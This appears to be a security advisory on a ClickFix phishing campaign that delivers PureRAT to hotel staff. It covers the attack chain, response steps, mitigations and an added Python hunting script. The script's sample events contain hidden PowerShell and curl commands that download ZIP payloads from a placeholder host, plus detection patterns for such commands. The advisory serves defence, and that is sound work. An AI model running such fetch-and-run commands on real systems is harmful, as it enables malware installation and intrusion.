An extensive phishing campaign targeting the hospitality industry is using highly convincing ClickFix-style pages to harvest credentials and deliver PureRAT (zgRAT) to hotel systems. Operators impersonate booking platforms like Booking.com, lure hotel administrators with spear-phishing emails sent from compromised accounts, and push victims through a redirection chain that culminates in a malicious “captcha” page. The end result: stolen management credentials, hijacked booking accounts, fraudulent customer messages, and full remote-access capability on infected machines.
This campaign is notable for its scale, operational sophistication, and the commoditization of the attack chain — from credential harvesting and log checking to malware distribution and resale of valid Booking/Expedia/Airbnb logs on criminal marketplaces.
How the attack works — step by step
- Initial lure: attackers use a compromised email account to send targeted messages to hotel staff that appear to come from Booking.com or similar services.
- Redirection to ClickFix page: victims are redirected through a chain to a fake reCAPTCHA or “security check” page (ClickFix style) designed to appear legitimate.
- Clipboard hijack and HTTP downgrade: JavaScript on the page checks the browser context and forces an HTTP redirect; it often auto-copies a PowerShell command into the user’s clipboard.
- Execution by victim: the page instructs the victim to paste and run the copied command in Run/Terminal, which then probes the host and downloads a ZIP containing a malicious binary.
- Malware deployment and persistence: the binary installs via DLL side‑loading, establishes persistence (Run registry key), and ultimately loads PureRAT.
- Post‑compromise activity: attackers harvest credentials, capture keystrokes and screens, proxy traffic, and exfiltrate data or use accounts for fraud. They may also contact guests with fraudulent “verification” requests to steal payment details.
Why this campaign is particularly dangerous for hotels
- Direct access to booking platforms: admin credentials allow attackers to manipulate reservations, issue fraudulent refunds, or harvest guest PII and payment data.
- Credential resale economy: stolen Booking/Expedia logs are validated and sold via dedicated forums and Telegram bots, so a compromise stays profitable for attackers even after the initial intrusion has been cleaned up.
- High fraud ROI: successful compromises allow attackers to perform targeted guest fraud (phishing via WhatsApp/email), which monetizes quickly compared to many enterprise intrusions.
- Social engineering sophistication: ClickFix pages now include videos, timers, OS-adjusted instructions, and clipboard hijacking — all designed to shorten user scrutiny and increase success rates.
- Malware capability: PureRAT provides full remote control, keylogging, audio/video capture, file exfiltration, and proxying — enabling deep fraud, persistence, and further compromise.
Immediate actions for hotel IT and security teams
- Block and quarantine: identify and block the phishing sender address and associated domains; quarantine affected inboxes and scan for other compromised senders.
- Educate staff immediately: issue an urgent advisory to administrators and front‑desk staff warning about fake Booking.com/Expedia emails, instructing them never to paste or execute code from web pages.
- Disable risky workflows: temporarily disable in‑browser “security check” workflows that direct staff to run local commands; require verification via official vendor portals.
- Rotate credentials and sessions: reset credentials for Booking, Expedia, and property-management system (PMS) accounts; revoke active sessions and reissue API keys where applicable.
- Scan and remediate endpoints: run EDR/AV scans, hunt for persistence artifacts (Run registry keys, DLL side‑loading traces), and isolate or reimage infected hosts.
- Harden backups and recovery: ensure backups are offline or immutable to prevent deletion and enable rapid restoration if hosts are wiped or encrypted.
- Monitor for outbound traffic: watch for connections to unknown C2 hosts, and for lateral movement indicators such as remote desktop sessions from unusual internal systems.
Detection and hunting tips
- Look for PowerShell or cURL executions launched from user contexts shortly after a link is clicked, especially commands that download and unzip payloads.
- Hunt for new Run registry entries or DLLs loaded from nonstandard directories.
- Monitor DNS for domain lookups tied to credential-checking services, Telegram bot domains, or suspicious log‑checker proxies.
- Correlate booking-platform logins with unusual IPs, geolocations, or proxy-based access patterns typical of log-checker services.
- Watch customer-facing channels (email, WhatsApp) for phishing messages that match stolen booking templates and timestamps following admin account access.
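As an added illustration that is not part of the original article, the following Python sketch applies the hunts above to constructed Sysmon-style process and registry events. The field names, sample paths and example.invalid URLs are assumptions for the demo; in practice the same rules would run in a SIEM over real process-creation (Sysmon Event ID 1) and registry (Event ID 13) telemetry.

```python
import json
import re

# Constructed Sysmon-style JSON events (not real campaign telemetry) showing the
# shapes the hunt looks for: a pasted PowerShell download, a Run-key write, and noise.
SAMPLE_EVENTS = [
    json.dumps({"type": "process", "parent": "C:\\Windows\\explorer.exe",
                "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "cmdline": "powershell -w hidden -c \"iwr http://example.invalid/a.zip -o a.zip; Expand-Archive a.zip\""}),
    json.dumps({"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\upd",
                "image": "C:\\Users\\frontdesk\\AppData\\Roaming\\upd\\loader.exe"}),
    json.dumps({"type": "process", "parent": "C:\\Windows\\explorer.exe",
                "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "cmdline": "notepad++.exe notes.txt"}),
    json.dumps({"type": "process", "parent": "C:\\Windows\\System32\\cmd.exe",
                "image": "C:\\Windows\\System32\\curl.exe",
                "cmdline": "curl -s http://example.invalid/p.zip -o %TEMP%\\p.zip"}),
]

LOLBINS = re.compile(r"\\(powershell|pwsh|curl|cmd|mshta)\.exe$", re.I)
# Where a ClickFix paste lands: the Run dialog (explorer.exe) or a browser-spawned shell.
INTERACTIVE_PARENTS = re.compile(r"\\(explorer|chrome|msedge|firefox)\.exe$", re.I)
DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|https?://)", re.I)
UNPACK = re.compile(r"(expand-archive|\.zip\b|tar\s)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
NONSTD_DIR = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)

def score_event(event: dict) -> list[str]:
    """Return the hunt rules an event matches (empty list means nothing to chase)."""
    hits = []
    if event["type"] == "process":
        lolbin = LOLBINS.search(event["image"]) is not None
        if lolbin and DOWNLOAD.search(event["cmdline"]):
            hits.append("download-via-lolbin")
            if UNPACK.search(event["cmdline"]):
                hits.append("download-and-unzip")
        if lolbin and INTERACTIVE_PARENTS.search(event["parent"]):
            hits.append("interactive-parent")
    elif event["type"] == "registry" and RUN_KEY.search(event["key"]):
        hits.append("run-key-persistence")
        if NONSTD_DIR.search(event["image"]):
            hits.append("nonstandard-dir")
    return hits

def hunt(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Parse JSON log lines; return (line_index, matched_rules) for suspicious ones."""
    scored = [(i, score_event(json.loads(line))) for i, line in enumerate(lines)]
    return [(i, hits) for i, hits in scored if hits]
```

Running `hunt(SAMPLE_EVENTS)` flags the pasted PowerShell download, the Run-key write into AppData and the curl fetch, while the Notepad++ launch produces no finding.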
Practical mitigations and longer-term controls
- Enforce multi-factor authentication and session governance for all booking/extranet accounts; require hardware or FIDO2 tokens for admin users.
- Harden admin workstations: apply application allow‑listing, restrict the ability to execute PowerShell or terminal commands from untrusted sites, and use dedicated hardened jump boxes for account management.
- Block clipboard-based command workflows: educate users and use endpoint controls to prevent or alert on commands pasted from the clipboard into Run or a terminal.
- Implement least privilege and network segmentation for systems that manage bookings and payment processing; isolate the vaults and management tools.
- Employ anti-phishing controls: DMARC/DKIM/SPF enforcement, advanced email threat protection, and URL sandboxing to reduce malicious link reachability.
- Subscribe to threat feeds and marketplace monitoring: watch for credentials or logs connected to your brand in criminal marketplaces and Telegram channels.
- Regularly test social-engineering resilience with targeted phishing simulations tailored to booking workflows.
Communications templates (short)
- Ops alert (to IT/security): “Immediate action: phishing campaign impersonating Booking.com—block domains, force password resets for extranet/admin accounts, and scan endpoints for persistence. Do not run any copied commands.”
- Staff notice (to hotel admins): “If you received an email asking you to run a command or verify bookings via a link, do not follow it. Report the email to IT and change your Booking/Expedia password immediately.”
- Guest advisory (if customer data potentially exposed): “We are investigating a security incident affecting administrative systems. If you receive suspicious booking verification messages, do not provide payment details and contact our official support line.”
Strategic recommendations for hospitality CISOs
- Treat booking platforms as crown‑jewel applications: enforce stronger authentication, dedicated admin workflows, and stricter logging.
- Build partnerships with major OTAs (Booking, Expedia) to establish rapid takedown and credential-swap workflows when compromises occur.
- Invest in EDR visibility and rapid forensic capability on front‑desk and admin endpoints that have direct access to extranet systems.
- Contractually require third‑party integrators and franchisees to meet minimum security baselines (MFA, endpoint protection, segmented networks).
- Create playbooks that cover both administrator account compromise and guest-facing phishing fraud, including legal and PR steps for customer communication.
Final thought
The ClickFix–PureRAT campaign is a stark reminder that social engineering remains the most efficient path into sensitive systems — especially where attackers can tie admin access directly to financial gain. For the hospitality industry, the stakes are high: stolen extranet accounts translate directly into revenue and trust losses. The defense is straightforward but operationally demanding: reduce human risk through training and hardened workflows, lock down admin endpoints, and treat booking-platform credentials as top-tier secrets.